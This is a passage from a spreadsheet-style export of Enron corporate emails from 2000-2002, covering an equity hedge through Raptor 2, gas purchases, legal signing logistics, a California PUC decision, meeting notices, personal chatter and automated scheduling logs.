    <t>I understand that management has decided to hedge our equity interests in _x000D_
these three assets. I've been asked to complete this on Monday of next week _x000D_
(sorry for the short notice, I think this decision was made only yesterday). _x000D_
These hedges will be done in a structured hedging facility known as Raptor 2._x000D_
_x000D_
In order to write the confirms and complete this process, we'll need at least _x000D_
to do the following. _x000D_
_x000D_
We'll need a complete description of the equity interest we're hedging. We'll _x000D_
need the full legal name of the issuer of the equity interest, a full legal _x000D_
description of the equity interest (common stock, preferred stock, warrants, _x000D_
etc.), the number of the certificate (if any) representing the interest  and _x000D_
the number of shares or warrants being hedged._x000D_
_x000D_
I understand that the hedge will be structured as a price return swap and the _x000D_
initial equity notional amount of the swap will be based on the book value of _x000D_
the equity interest. It would be helpful to see the latest financial _x000D_
statements showing that book value._x000D_
_x000D_
We will also need to investigate whether any contractual or other legal _x000D_
restrictions may affect our ability to enter into these hedges._x000D_
_x000D_
This is an initial list that I've prepared very quickly. I'll be reviewing _x000D_
this with Sara later today and will supplement this email as necessary._x000D_
_x000D_
Randy, I've tried to reach Frank this morning but he is traveling. Can you or _x000D_
someone on your staff assist us on this? Thanks!</t>
  </si>
  <si>
    <t>Thu, 2 Nov 2000 02:04:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: PLEASE NOTE: the Florida Greenfield Mtgs have moved---For your_x000D_
 information.</t>
  </si>
  <si>
    <t xml:space="preserve">Sheila went to these. I believe they cover the activities related to the _x000D_
development of the various site.  _x000D_
_x000D_
I'm on a conference call or I would have called._x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
From: Barbara N Gray@ECT on 11/02/2000 09:52 AM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: PLEASE NOTE: the Florida Greenfield Mtgs have moved---For your _x000D_
information._x000D_
_x000D_
Kay, do you generally attend these meetings?? What is generally covered in _x000D_
these meetings??? Please at your convenience give me a shout .  thanks bng_x000D_
----- Forwarded by Barbara N Gray/HOU/ECT on 11/02/2000 09:49 AM -----_x000D_
_x000D_
	Sheila Tweed_x000D_
	11/01/2000 07:56 PM_x000D_
		 _x000D_
		 To: Barbara N Gray/HOU/ECT@ECT, Jeffrey T Hodge/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: PLEASE NOTE: the Florida Greenfield Mtgs have moved---For your _x000D_
information._x000D_
_x000D_
_x000D_
----- Forwarded by Sheila Tweed/HOU/ECT on 11/01/2000 07:55 PM -----_x000D_
_x000D_
	Lorie Leigh_x000D_
	10/31/2000 03:02 PM_x000D_
		 _x000D_
		 To: Kathleen Carnahan/NA/Enron@Enron, Steven _x000D_
Rose/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, David _x000D_
McDeed/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Ben F Jacoby/HOU/ECT@ECT, Raimund _x000D_
Grube/Corp/Enron@ENRON, Steve Krimsky/Corp/Enron@Enron, Greg _x000D_
Krause/Corp/Enron@Enron, Dave Kellermeyer/HOU/ECT@ECT, Sheila _x000D_
Tweed/HOU/ECT@ECT, Dinoff@andrews-kurth.com, Stuart Zisman/HOU/ECT@ECT, Linda _x000D_
J Noske/HOU/ECT@ECT, Bob Carter/HOU/ECT@ECT, drunnels@andrews-kurth.com, _x000D_
cboehler@andrews-kurth.com, Ed B Hearn III/HOU/ECT@ECT, Larry _x000D_
Soderquist/HOU/ECT@ECT, Karen E Carter/NA/Enron@Enron_x000D_
		 cc: Shelby Malkemes/Corp/Enron@ENRON_x000D_
		 Subject: PLEASE NOTE: the Florida Greenfield Mtgs have moved_x000D_
_x000D_
_x000D_
The Florida Greenfield Meetings have permanantly moved to take place every _x000D_
MONDAY at 11:00 - 1:00 (central)._x000D_
_x000D_
Conference  Plus will be hosting these conference calls   _x000D_
the number: 1-800-991-9019_x000D_
the passcode: 5595148_x000D_
_x000D_
For those here at Enron, conference room EB2934 has been reserved for the _x000D_
following dates:_x000D_
November 6th_x000D_
November 13th_x000D_
November 20th_x000D_
November 27th_x000D_
December 4th_x000D_
December 11th_x000D_
December 18th_x000D_
January 1st_x000D_
_x000D_
PLEASE note that Monday, December 25th was not scheduled due to the Christmas _x000D_
holiday._x000D_
 _x000D_
If you have any problems or questions, please feel free to call me at _x000D_
713-853-1696._x000D_
_x000D_
Thank you,_x000D_
Lorie Leigh_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 25 Feb 2002 13:40:39 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'margaret.dhont@enron.com'})</t>
  </si>
  <si>
    <t>gas purchases for mcv</t>
  </si>
  <si>
    <t>_x000D_
	Margaret,_x000D_
_x000D_
	I have bought the gas from Mario Silva at Anadarko.  His number is 832-636-7164.  Listed below are the volumes and prices._x000D_
_x000D_
	Trunkline ELA	12,800 MMbtu@$2.28		$904,704_x000D_
	PEPL		  5,000 MMbtuf@$2.25		  348,750_x000D_
	ANR SE	  4,000 MMbtu@$2.28		  282,720_x000D_
	_x000D_
	Total 						$1,536,174_x000D_
_x000D_
	I verbally confirmed the wiring information with Mario.  The wire needs to go out on Feb. 27.  I have requested that Mario email me _x000D_
	all the pertinent information just to doublecheck.  I will forward you the email when I receive it.  I will do the cash request next._x000D_
_x000D_
	Thanks_x000D_
	Robin</t>
  </si>
  <si>
    <t>Tue, 6 Nov 2001 13:37:05 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'peter.del@enron.com'})</t>
  </si>
  <si>
    <t>Made contact with Meg Helma, Coral's in-house attorney today.  Learned that Coral is very keen to put together thye MNA and is getting outside counsel to clear conflicts so they can advise regarding validity.  We hope to have a copnference call with Coarl, their attorney, Antonoff and myself tomorrow or the next.  Meg and I have compared notes about the outstanding masters._x000D_
Canadian docs sent to Morris Clark._x000D_
Contacted Joel Ephross/Barbara Gray re extraction of gas receivables._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Heard, Marie  _x000D_
Sent:	Tuesday, November 06, 2001 3:29 PM_x000D_
To:	Aronowitz, Alan; Athena Alexander (E-mail); Clark, Morris; Cook, Mary; David Mitchell (E-mail); Davis, Angela; Del vecchio, Peter; Douglas, Stephen H.; Evans, Mark (London Legal); Gaffney, Chris; Gray, Barbara N.; Hansen, Leslie; Heard, Marie; Hendry, Brent; Hodge, Jeffrey T.; Johnston, Greg; Jones, Tana; Keohane, Peter; Koehler, Anne C.; Lech Kalembka (E-mail); Leite, Francisco Pinto; Marissa Morelle (E-mail); McCullough, Travis; Mellencamp, Lisa; Murphy, Harlan; Murray, Julia; Nemec, Gerald; Portz, David; Rick Antonoff (E-mail); Rohauer, Tanya; Sager, Elizabeth; Saxena, Rahul; Sayre, Frank; Schuh, Michael; Shackleton, Sara; Simons, Paul; St. Clair, Carol; Van Hooser, Steve; Viverito, John; Von Bock Und Polach, Marcus; Williams, Jason R (Credit)_x000D_
Subject:	Status of Agreements_x000D_
_x000D_
Per Carol's request, please e-mail Carol, Mary and me with an update on the agreements you are working on._x000D_
_x000D_
Thanks!_x000D_
_x000D_
Marie</t>
  </si>
  <si>
    <t>Mon, 29 Jan 2001 07:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: BEAR Program</t>
  </si>
  <si>
    <t xml:space="preserve">Great job!  Thanks.  Mark_x000D_
_x000D_
_x000D_
_x000D_
	Mary Clark@ENRON_x000D_
	01/29/2001 02:46 PM_x000D_
		 _x000D_
		 To: Mark E Haedicke/HOU/ECT@ECT, Laura Schwartz/Corp/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: BEAR Program_x000D_
_x000D_
Mark, I've attached the story about the BEARing Gifts program for your _x000D_
review.  Please return your comments to me by Friday, Feb. 2. _x000D_
_x000D_
Laura, please run the story by Judy Herold at CPS.  _x000D_
_x000D_
Thanks to all for this wonderful little story.  It warmed our hearts here in _x000D_
PR._x000D_
_x000D_
Mary_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 31 May 2001 03:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">I can't wait to use the "baby Carnahan" things!  It makes me excited just to _x000D_
think about it.  And funny you would mention the last name thing because I _x000D_
was just thinking about that last night.  The father's name is Dustin Elkins, _x000D_
but I doubt they will get married (at least Shayne has not indicated that _x000D_
they were).  Kayne reminds me of my niece and nephew's names (Kade and Konner _x000D_
Carnahan).  _x000D_
_x000D_
I just talked to Carlos.  He is already in Colorado and in the process of _x000D_
renting a car.  I told him about the gift thing and he does not think it _x000D_
would be a problem.  The deal is, that the Indian Chief that Matt Gimble has _x000D_
been dealing with was ousted and so Matt, et al. want to give the "new" Chief _x000D_
a saddle and maybe a fishing real.  They also want to give the 4 tribal _x000D_
counsel and their attorney pen &amp; pencil sets and shirts._x000D_
_x000D_
Anyway, Carlos did not think it would be a problem but asked me to double _x000D_
check with Andy Edison just in case._x000D_
_x000D_
How embarrassing to be stripped of chiefhood!  I'll bet ole' Chief Sitting _x000D_
Bull is turning over in his grave!_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Mann, Kay  _x000D_
Sent: Thursday, May 31, 2001 9:57 AM_x000D_
To: Carnahan, Kathleen_x000D_
Subject: RE: important stuff_x000D_
_x000D_
I've got the crib, a playpen, red and blue check bumpers for the crib, a _x000D_
never used airplane baby swing you hang on a trees (our trees were too tall), _x000D_
perhaps a jogging stroller (don't think we gave it away), and I don't know _x000D_
what else.  All have "baby Carnahan" on it.  Will she give the baby her last _x000D_
name?  That would be cool._x000D_
_x000D_
I met someone (a guy)  named Kayne.  Yes, I know it looks like Kay, but I _x000D_
thought it sounded cool.  Kayne Carnahan.  Opps, sounds like a bull rider!_x000D_
_x000D_
ckm_x000D_
_x000D_
_x000D_
From: Kathleen Carnahan/ENRON@enronXgate on 05/31/2001 09:45 AM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: RE: important stuff_x000D_
_x000D_
Remember not to throw away baby stuff!  My oldest daughter, Sara has already _x000D_
bought a complete wardrobe for the baby including girl and boy outfits.  I _x000D_
guess I had better get on the ball and at least buy a "I Love Granny" bib or _x000D_
something!  Ha._x000D_
_x000D_
Do you know Carlos' cell phone number?  His normal secretary is out._x000D_
_x000D_
K-_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Mann, Kay  _x000D_
Sent: Thursday, May 31, 2001 9:37 AM_x000D_
To: Carnahan, Kathleen_x000D_
Subject: RE: important stuff_x000D_
_x000D_
Thanks, but I'm throwing away junk all weekend.  Neil will be gone...._x000D_
_x000D_
_x000D_
From: Kathleen Carnahan/ENRON@enronXgate on 05/31/2001 09:28 AM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: RE: important stuff_x000D_
_x000D_
Lake Woodlands, do you want to come?_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Mann, Kay  _x000D_
Sent: Thursday, May 31, 2001 9:23 AM_x000D_
To: Carnahan, Kathleen_x000D_
Subject: important stuff_x000D_
_x000D_
So where are you kayaking this weekend?_x000D_
_x000D_
ckm_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sat, 17 Nov 2001 23:23:51 -0800 (PST)</t>
  </si>
  <si>
    <t>Dear Amazon.com Customer,_x000D_
_x000D_
Come experience the holidays at Amazon.com. We've thought of_x000D_
everything to make your gift giving easier--plus, for a limited_x000D_
time, we're offering free shipping on orders over $99._x000D_
_x000D_
http://www.amazon.com_x000D_
_x000D_
Whether you're shopping for books and CDs, electronics and DVDs, or_x000D_
housewares and toys, you'll find a huge selection, great deals, and_x000D_
convenient gift services, too:_x000D_
_x000D_
- Wrap &amp; Ship--Let us do the work (you can take the credit)._x000D_
- Wish List--Make shopping easier for your loved ones. _x000D_
- Gift Certificates--Easy, fast, and always appreciated._x000D_
_x000D_
We hope you'll stop by today and start your holiday shopping now to_x000D_
take advantage of free shipping. Discover how easy it can be to_x000D_
find, buy, give... and relax._x000D_
_x000D_
http://www.amazon.com_x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Amazon.com Holiday Team_x000D_
_x000D_
We hope you enjoyed receiving this message. However, if you'd rather_x000D_
not receive future e-mails of this sort from Amazon.com, please_x000D_
visit the Help page named Updating Subscriptions and Communication_x000D_
Preferences through the link below, then click the Customer_x000D_
Communication Preferences link._x000D_
_x000D_
http://www.amazon.com/unsubscribe_x000D_
_x000D_
Please note that this message was sent to the following e-mail_x000D_
address:_x000D_
_x000D_
brapp@enron.com</t>
  </si>
  <si>
    <t>Wed, 30 May 2001 07:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'majed.nachawati@enron.com'})</t>
  </si>
  <si>
    <t>Majed's Parking</t>
  </si>
  <si>
    <t>Gerald,_x000D_
_x000D_
I spoke with the parking department. They said to send an e-mail saying it is _x000D_
alright for me to receive subsidized parking. When you e-mail them, they also _x000D_
need the company #, and RC #. I know you are real busy, so please send the _x000D_
e-mail at your earliest convenience. In addition, if you have any more gas _x000D_
transactional work, please send it my way. Louis Allen is the person that _x000D_
needs to receive the e-mail from you. His address is louis.allen@enron.com. _x000D_
Also, they probably have my legal name, which is Nabil Nachawati. _x000D_
_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Majed</t>
  </si>
  <si>
    <t>Tue, 9 Jan 2001 04:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>i will take minnesota -2</t>
  </si>
  <si>
    <t>Thu, 24 Jan 2002 14:15:53 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'timothy.blanchard@enron.com', 'eric.bass@enron.com', 'david.baumbach@enron.com', 'd..winfree@enron.com'})</t>
  </si>
  <si>
    <t>OK, here's the deal.  I've heard from everyone and we're good for tomorrow!  Now - where and when? I park in Allen Center and can carry 3 people.  Who else can drive?  I'm available anytime - like 11:30 or so._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Baumbach, David  _x000D_
Sent:	Thursday, January 24, 2002 3:08 PM_x000D_
To:	Herod, Brenda F.; Bass, Eric; Blanchard, Timothy; Winfree, O'Neal D._x000D_
Subject:	RE: Lunch_x000D_
_x000D_
I'm in for tomorrow ... _x000D_
_x000D_
Dave_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Herod, Brenda F.  _x000D_
Sent:	Thursday, January 24, 2002 1:46 PM_x000D_
To:	Bass, Eric; Blanchard, Timothy; Baumbach, David; Winfree, O'Neal D._x000D_
Subject:	Lunch_x000D_
_x000D_
Since Mr. Bass didn't follow through on our social engagement, I thought I would do so.  Is anyone interested in lunch?  Is tomorrow too early for you all or should we shoot for next week?  Mr. Hull and I are both available tomorrow.  You guys let me know.  We'll have to go dutch (no more expense report) or one of you UBS people with your big bonuses will have to pick it up!_x000D_
_x000D_
Let me know.</t>
  </si>
  <si>
    <t>Tue, 6 Nov 2001 12:28:24 -0800 (PST)</t>
  </si>
  <si>
    <t>I got your card.  Thanks for joining us on Saturday night.  Shanna and I always enjoy your company._x000D_
_x000D_
Love,_x000D_
E</t>
  </si>
  <si>
    <t>Fri, 4 Jan 2002 13:17:14 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'cbroussard@harveybuilders.com'})</t>
  </si>
  <si>
    <t>frozenset({'e-mail &lt;.jarett@enron.com&gt;', 'shives.jondell@enron.com', 'wilson.brian@enron.com', 'e-mail &lt;.david@enron.com&gt;', 'e-mail &lt;.keith@enron.com&gt;', 'e-mail &lt;.tom@enron.com&gt;', 'e-mail &lt;.chris@enron.com&gt;', 'e-mail &lt;.kevin@enron.com&gt;', 'hammer.mark@enron.com', 'e-mail &lt;.greg@enron.com&gt;', 'cooper.jason@enron.com', 'kara.boudreau@enron.com', 'e-mail &lt;.tyndall@enron.com&gt;', 'e-mail &lt;.tony@enron.com&gt;', 'bender.keith@enron.com', 'rogge.kevin@enron.com', 'e-mail &lt;.jeff@enron.com&gt;', 'e-mail &lt;.jim@enron.com&gt;'})</t>
  </si>
  <si>
    <t>HH?</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
thirsty?_x000D_
cold beers with hot  dogs &amp; probably some venison at Edy's Ice House this  evening_x000D_
 _x000D_
Chris Broussard_x000D_
Project Manager_x000D_
D.E. Harvey Builders_x000D_
713-783-8710_x000D_
 </t>
  </si>
  <si>
    <t>Tue, 18 Dec 2001 12:36:55 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 12/18/01; HourAhead hour: 11;</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 12/18/01; HourAhead hour: 11;  No ancillary schedules awarded.  No variances detected. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2001121811.txt</t>
  </si>
  <si>
    <t>Thu, 21 Dec 2000 09:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Jeff Dasovich/NA/Enron on 12/21/2000 05:28 PM -----_x000D_
_x000D_
	Paul Kaufman@ECT_x000D_
	12/21/2000 03:28 PM_x000D_
		 _x000D_
		 To: George McClellan/HOU/ECT@ECT, Kevin McGowan/Corp/Enron@ENRON, Stuart _x000D_
Staley/LON/ECT@ECT, Lisa Yoho/NA/Enron@Enron, skean@enron.com@ENRON, Richard _x000D_
Shapiro/NA/Enron@Enron, Susan J Mara/NA/Enron@ENRON, Sandra _x000D_
McCubbin/NA/Enron@Enron, Paul Kaufman/PDX/ECT@ECT, James D _x000D_
Steffes/NA/Enron@Enron, Harry Kingerski/NA/Enron@Enron, Wanda _x000D_
Curry/HOU/EES@EES@ENRON, Dennis Benevides/HOU/EES@EES@ENRON, Roger _x000D_
Yang/SFO/EES@EES@ENRON, Scott Stoness/HOU/EES@EES@ENRON, Mary _x000D_
Hain/HOU/ECT@ECT, Joe Hartsoe/Corp/Enron@ENRON, Sarah _x000D_
Novosel/Corp/Enron@ENRON, Mona L Petrochko/NA/Enron@Enron, Jennifer _x000D_
Rudolph/HOU/EES@EES@ENRON, Eric Letke/DUB/EES@EES@ENRON, Vicki _x000D_
Sharp/HOU/EES@EES@ENRON, Michael Smith/ENRON@enronxgate@ENRON, Jeff _x000D_
Dasovich/NA/Enron@ENRON, Lysa Akin/PDX/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Re: California PUC Decision Info/Update_x000D_
_x000D_
Brief summary of the proposed decision:_x000D_
_x000D_
1. Commission will issue a final decision on rate adjustments and the end of _x000D_
the rate freeze on January 4.    To reach the final decision, the Commission _x000D_
will hold expedited hearings beginning December 27 to address:  _x000D_
_x000D_
 a. when rate freeze will end;_x000D_
 b. rate adjustments neccesary to maintain utility solvency;_x000D_
 c. whether utilities should retain remaining assets;_x000D_
 d. whether utilies should use their retained assets to serve native load _x000D_
(and what rate adjustments are necessary to accomplish such a result)._x000D_
_x000D_
2. Commission will take action to maintain solvency of utilities and the _x000D_
ability of the utilities to continue to provide service at just and _x000D_
reasonable rates._x000D_
_x000D_
_x000D_
We will give a full report on the conference call scheduled below._x000D_
---------------------- Forwarded by Paul Kaufman/PDX/ECT on 12/21/2000 01:29 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Alan Comnes_x000D_
12/21/2000 01:11 PM_x000D_
To: Joseph Alamo/NA/Enron@ENRON_x000D_
cc: George McClellan/HOU/ECT@ECT, Kevin McGowan/Corp/Enron@ENRON, Stuart _x000D_
Staley/LON/ECT@ECT, Lisa Yoho/NA/Enron@Enron, skean@enron.com@ENRON, Richard _x000D_
Shapiro/NA/Enron@Enron, Susan J Mara/NA/Enron@ENRON, Sandra _x000D_
McCubbin/NA/Enron@Enron, Paul Kaufman/PDX/ECT@ECT, James D _x000D_
Steffes/NA/Enron@Enron, Harry Kingerski/NA/Enron@Enron, Wanda _x000D_
Curry/HOU/EES@EES@ENRON, Dennis Benevides/HOU/EES@EES@ENRON, Roger _x000D_
Yang/SFO/EES@EES@ENRON, Scott Stoness/HOU/EES@EES@ENRON, Mary _x000D_
Hain/HOU/ECT@ECT, Joe Hartsoe/Corp/Enron@ENRON, Sarah _x000D_
Novosel/Corp/Enron@ENRON, Mona L Petrochko/NA/Enron@Enron, Jennifer _x000D_
Rudolph/HOU/EES@EES@ENRON, Eric Letke/DUB/EES@EES@ENRON, Vicki _x000D_
Sharp/HOU/EES@EES@ENRON, Michael Smith/ENRON@enronxgate@ENRON, Jeff _x000D_
Dasovich/NA/Enron@ENRON, Lysa Akin/PDX/ECT@ECT _x000D_
Subject: Re: California PUC Decision Info/Update  _x000D_
_x000D_
Here's the order that has just been posted.  My understanding is the CPUC _x000D_
will take this up at 2 p.m._x000D_
_x000D_
GAC_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Joseph Alamo@ENRON_x000D_
12/21/2000 10:30 AM_x000D_
To: George McClellan/HOU/ECT@ECT, Kevin McGowan/Corp/Enron@ENRON, Stuart _x000D_
Staley/LON/ECT@ECT, Lisa Yoho/NA/Enron@Enron, skean@enron.com, Richard _x000D_
Shapiro/NA/Enron@Enron, Susan J Mara/NA/Enron@ENRON, Sandra _x000D_
McCubbin/NA/Enron@Enron, Paul Kaufman/PDX/ECT@ECT, James D _x000D_
Steffes/NA/Enron@Enron, Harry Kingerski/NA/Enron@Enron, Wanda _x000D_
Curry/HOU/EES@EES, Dennis Benevides/HOU/EES@EES, Roger Yang/SFO/EES@EES, _x000D_
Scott Stoness/HOU/EES@EES, Mary Hain/HOU/ECT@ECT, Alan Comnes/PDX/ECT@ECT, _x000D_
Joe Hartsoe/Corp/Enron@ENRON, Sarah Novosel/Corp/Enron@ENRON, Mona L _x000D_
Petrochko/NA/Enron@Enron, Jennifer Rudolph/HOU/EES@EES, Eric _x000D_
Letke/DUB/EES@EES, Vicki Sharp/HOU/EES@EES, Michael Smith/ENRON@enronxgate_x000D_
cc: Jeff Dasovich/NA/Enron, Lysa Akin/PDX/ECT@ECT _x000D_
_x000D_
Subject: California PUC Decision Info/Update_x000D_
_x000D_
_x000D_
On behalf of Jeff Dasovich, please note:  _x000D_
_x000D_
the California PUC decision will be available on _x000D_
the PUC website @ 1:00 PM PST. _x000D_
_x000D_
The Commission will continue the meeting @ 2:00 PM PST _x000D_
to address the issue._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Joseph Alamo_x000D_
Sr. Admin. Asst._x000D_
Government Affairs - The Americas_x000D_
San Francisco CA_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 1 Feb 2002 10:37:17 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 2/1/02; HourAhead hour: 13;</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 2/1/02; HourAhead hour: 13;  No ancillary schedules awarded.  No variances detected. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002020113.txt</t>
  </si>
  <si>
    <t>Thu, 15 Mar 2001 06:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jpalmer@enron.com'})</t>
  </si>
  <si>
    <t>gas trading position</t>
  </si>
  <si>
    <t xml:space="preserve">Here is the resume we talked about:  _x000D_
_x000D_
_x000D_
_x000D_
 - Resume 2.doc_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Mar 2001 06:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t>SIGNING LOGISTICS</t>
  </si>
  <si>
    <t xml:space="preserve">Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 03/20/2001 02:55 PM -----_x000D_
_x000D_
	TeiglandL@sullcrom.com_x000D_
	03/20/2001 02:41 PM_x000D_
		 _x000D_
		 To: Sshackl@enron.com, _x000D_
IMCEAGWISE-GWGateB+2ENYGWIA01+2E+22Janice+2ER+2EMoore+40enron+2Ecom+22@sullcro_x000D_
m.com, kpolozie@mwe.com, _x000D_
IMCEAGWISE-GWGateB+2ENYGWIA01+2E+22YYaish+40exchange+2Eml+2Ecom+22@sullcrom.co_x000D_
m_x000D_
		 cc: GilbergD@sullcrom.com, lpeddic@alleghenyenergy.com, _x000D_
LMCMURRAY@EXCHANGE.ML.COM_x000D_
		 Subject: SIGNING LOGISTICS_x000D_
_x000D_
_x000D_
It appears we will soon be ready to exchange signature pages at long last..._x000D_
We await only the parties' final sign off on the schedule of trades being_x000D_
transferred._x000D_
_x000D_
Below are the proposed logistics for signing:_x000D_
_x000D_
1. TRANSFER AND ASSUMPTION AGREEMENT * Each party to execute 5 originals_x000D_
_x000D_
 (a) Enron and S&amp;C to fax an executed signature page for this_x000D_
document to Kate Polozie at McDermott, Will &amp; Emery, fax. no. 202-756-8087._x000D_
_x000D_
 (b) Enron and S&amp;C to send 5 (five) original signature pages via_x000D_
overnight courier to:_x000D_
_x000D_
   Kate Polozie, McDermott, Will &amp; Emery, 600 13th St. N.W.,_x000D_
Washington, D.C. 20005-3096._x000D_
_x000D_
 (c) Kate will compile and distribute complete documents to all_x000D_
parties once all originals are received._x000D_
_x000D_
2. POWER MASTER AMENDMENT &amp; ISDA SIDE LETTER_x000D_
* Each party to execute 2 originals_x000D_
_x000D_
 (a) (1) Enron to fax an executed signature page for each document to_x000D_
Lauren Teigland, S&amp;C, fax. no. 212-558-4947._x000D_
_x000D_
      (2) Enron to retain 1 (one) original and send 1 (one) original_x000D_
signature page for each document via overnight courier to:_x000D_
_x000D_
  Lauren Teigland, Sullivan &amp; Cromwell, 125 Broad Street, New_x000D_
York, NY 10004-2498._x000D_
_x000D_
 (b) (1)  S&amp;C to fax signature pages for each document to Janice_x000D_
Moore and Sara Shackleton, fax. no. 713-646-3490._x000D_
_x000D_
      (2)  S&amp;C to retain 1 (one) original and send 1 (one) original_x000D_
signature page for each document via overnight courier to [Enron to_x000D_
confirm]:_x000D_
_x000D_
   [Janice Moore/Sara Shackleton], [Enron Power Marketing,_x000D_
Inc.], 1600 Smith Street, Houston, TX 77002._x000D_
 Please let me know if you have any questions/comments about the above._x000D_
_x000D_
Best regards, Lauren_x000D_
_x000D_
----------------------------------_x000D_
_x000D_
This e-mail is sent by a law firm and contains information_x000D_
that may be privileged and confidential. If you are not the_x000D_
intended recipient, please delete the e-mail and notify us_x000D_
immediately._x000D_
</t>
  </si>
  <si>
    <t>Wed, 21 Mar 2001 00:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jeffrey.keeler@enron.com', 'ray.alvarez@enron.com', 'steve.walton@enron.com', 'luiz.maurer@enron.com', 'sergio.assad@enron.com', 'robert.neustaedter@enron.com', 'tom.hoatson@enron.com', 'linda.noske@enron.com', 'lisa.yoho@enron.com', 'frank.rishe@enron.com', 'lysa.akin@enron.com', 'marchris.robinson@enron.com', 'paul.kaufman@enron.com', 'vinio.floris@enron.com', 'chauncey.hood@enron.com', 'thane.twiggs@enron.com', 'jeff.brown@enron.com', 'guillermo.canovas@enron.com', 'scott.bolton@enron.com', 'xi.xi@enron.com', 'ron.mcnamara@enron.com', 'kathleen.sullivan@enron.com', 'harry.kingerski@enron.com', 'assad@elektro.com.br', 'robert.frank@enron.com', 'susan.landwehr@enron.com', 'gloria.ogenyi@enron.com', 'alberto.levy@enron.com', 'eidy.catala@enron.com', 'sandra.mccubbin@enron.com', 'roy.boston@enron.com', 'joe.connor@enron.com', 'stephen.burns@enron.com', 'linda.robertson@enron.com', 'stella.chan@enron.com', 'joe.hillings@enron.com', 'carmen.perez@enron.com', 'bill.moore@enron.com', 'javier.pantoja@enron.com', 'eric.benson@enron.com', 'steve.montovano@enron.com', 'ginger.dernehl@enron.com', 'susan.mara@enron.com', 'kirsten.bellas@enron.com', 'aleck.dadson@enron.com', 'allison.navin@enron.com', 'jean.dressler@enron.com', 'rebecca.cantrell@enron.com', 'robin.kittel@enron.com', 'kikumi.kishigami@enron.com', 'elizabeth.linnell@enron.com', 'jeff.dasovich@enron.com', 'bernadette.hawkins@enron.com', 'donald.lassere@enron.com', 'barbara.hueter@enron.com', 'sue.nord@enron.com', 'alan.comnes@enron.com', 'rubena.buerger@enron.com', 'geriann.warner@enron.com', 'melinda.pharms@enron.com', 'patrick.keene@enron.com', 'tom.chapman@enron.com', 'sarah.novosel@enron.com', 'marcia.linton@enron.com', 'mona.petrochko@enron.com', 'amy.fabian@enron.com', 'gisele.braz@enron.com', 'leslie.lawner@enron.com', 'jose.bestard@enron.com', 'mike.roan@enron.com', 'joe.allen@enron.com', 'lara.leibman@enron.com', 'nancy.hetrick@enron.com', 'daniel.allegretti@enron.com', 'janel.guerrero@enron.com', 'carolyn.cooney@enron.com', 'valeria.lima@enron.com', 'christi.nicolay@enron.com', 'maureen.mcvicker@enron.com', 'germain.palmer@enron.com', 'richard.ingersoll@enron.com', 'tom.briggs@enron.com', 'terri.miller@enron.com', 'dave.mangskau@enron.com', 'robert.hemstock@enron.com', 'donna.fulton@enron.com', 'lindsay.meade@enron.com', 'joao.paixao@enron.com', 'dan.staines@enron.com', 'mary.hain@enron.com', 'lora.sullivan@enron.com', 'chris.long@enron.com', 'richard.shapiro@enron.com', 'joseph.alamo@enron.com', 'steven.kean@enron.com', 'janine.migden@enron.com', 